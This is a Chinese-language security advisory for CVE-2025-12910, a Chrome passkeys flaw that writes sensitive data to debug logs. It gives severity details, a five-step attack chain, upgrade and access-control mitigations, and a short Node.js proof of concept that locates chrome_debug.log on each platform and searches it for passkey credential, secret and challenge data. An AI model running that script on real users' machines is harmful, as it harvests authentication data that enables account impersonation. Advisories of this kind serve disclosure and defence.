CVE-2025-12910: Google Chrome Passkeys实现不当导致信息泄露漏洞

漏洞信息

漏洞编号

CVE-2025-12910

漏洞类型

信息泄露/实现不当

CVSS评分

6.2 中危

攻击向量

本地 (AV:L)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Google Chrome

漏洞概述

CVE-2025-12910是Google Chrome浏览器中Passkeys功能的一个实现不当漏洞。该漏洞存在于Chrome 140.0.7339.80之前的版本中，由于Passkeys实现存在缺陷，本地攻击者能够通过访问调试日志获取潜在的敏感信息。Passkeys是Google推出的基于FIDO标准的无密码认证技术，旨在替代传统密码提供更安全的认证方式。然而，该漏洞的存在使得攻击者可以在特定条件下访问存储在调试日志中的敏感认证信息，可能导致用户账户面临风险。漏洞的安全严重性被Chromium项目评为低危，但CVSS评分达到6.2，属于中等严重程度。攻击者需要本地访问权限，但无需特殊权限或用户交互即可利用此漏洞。

技术细节

该漏洞的根本原因在于Google Chrome的Passkeys功能在处理敏感信息时，将潜在的敏感数据不当写入调试日志文件中。Passkeys是WebAuthn API的实现，用于创建和存储基于公钥加密的凭据。当用户创建或使用Passkeys时，系统会生成详细的调试信息以便于开发人员排查问题，但这些调试日志中包含了不应该暴露给非授权用户的敏感认证数据。攻击者通过本地访问受害者的系统，可以读取这些调试日志文件，从而获取Passkeys相关的敏感信息，包括可能的认证令牌、密钥标识符或其他可用于身份冒充的数据。由于Passkeys设计用于跨网站认证，获取这些信息可能使攻击者能够在其他网站上模拟受害者身份。漏洞影响所有在Windows、macOS和Linux平台上的Chrome用户。

攻击链分析

STEP 1

步骤1

攻击者获得目标系统的本地访问权限，包括读取文件系统权限

STEP 2

步骤2

攻击者定位Chrome浏览器的调试日志文件，通常位于用户配置目录下

STEP 3

步骤3

攻击者读取chrome_debug.log文件，搜索Passkeys相关的敏感信息

STEP 4

步骤4

从调试日志中提取潜在的敏感数据，如凭证标识符、认证挑战值等

STEP 5

步骤5

攻击者利用获取的信息尝试在其他网站上冒充受害者身份进行认证

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// CVE-2025-12910 PoC - Local attacker accessing Chrome debug logs
// Note: This is a conceptual PoC demonstrating the attack vector

const fs = require('fs');
const path = require('path');

// Common Chrome debug log locations
const debugLogPaths = {
    linux: path.join(process.env.HOME || '', '.config/google-chrome/chrome_debug.log'),
    mac: path.join(process.env.HOME || '', 'Library/Application Support/Google/Chrome/chrome_debug.log'),
    windows: path.join(process.env.LOCALAPPDATA || '', 'Google/Chrome/User Data/chrome_debug.log')
};

// Attack scenario: Local attacker reads debug logs for Passkey information
function exploitPasskeyInfoLeak() {
    const platform = process.platform;
    const logPath = debugLogPaths[platform];
    
    if (fs.existsSync(logPath)) {
        const logContent = fs.readFileSync(logPath, 'utf8');
        
        // Search for Passkey-related sensitive information
        const passkeyPatterns = [
            /passkey.*credential/i,
            /webauthn.*secret/i,
            /authenticator.*data/i,
            /challenge.*passkey/i
        ];
        
        passkeyPatterns.forEach(pattern => {
            const matches = logContent.match(new RegExp(pattern, 'gi'));
            if (matches) {
                console.log('[+] Potential sensitive Passkey data found:');
                console.log(matches.join('\n'));
            }
        });
    } else {
        console.log('[-] Debug log not found at expected location');
    }
}

exploitPasskeyInfoLeak();

// Mitigation: Disable debug logging or restrict log file access
// Upgrade Chrome to version >= 140.0.7339.80

影响范围

Google Chrome < 140.0.7339.80 (所有桌面平台)

防御指南

临时缓解措施

临时缓解措施包括：限制本地用户对Chrome用户数据目录的访问权限；监控和审计调试日志文件的访问记录；考虑禁用Chrome的详细调试日志功能（虽然这可能影响故障排除能力）；在企业环境中，使用端点保护解决方案监控可疑的文件访问行为。由于该漏洞需要本地访问权限，应确保系统安全，防止未经授权的物理访问和远程访问。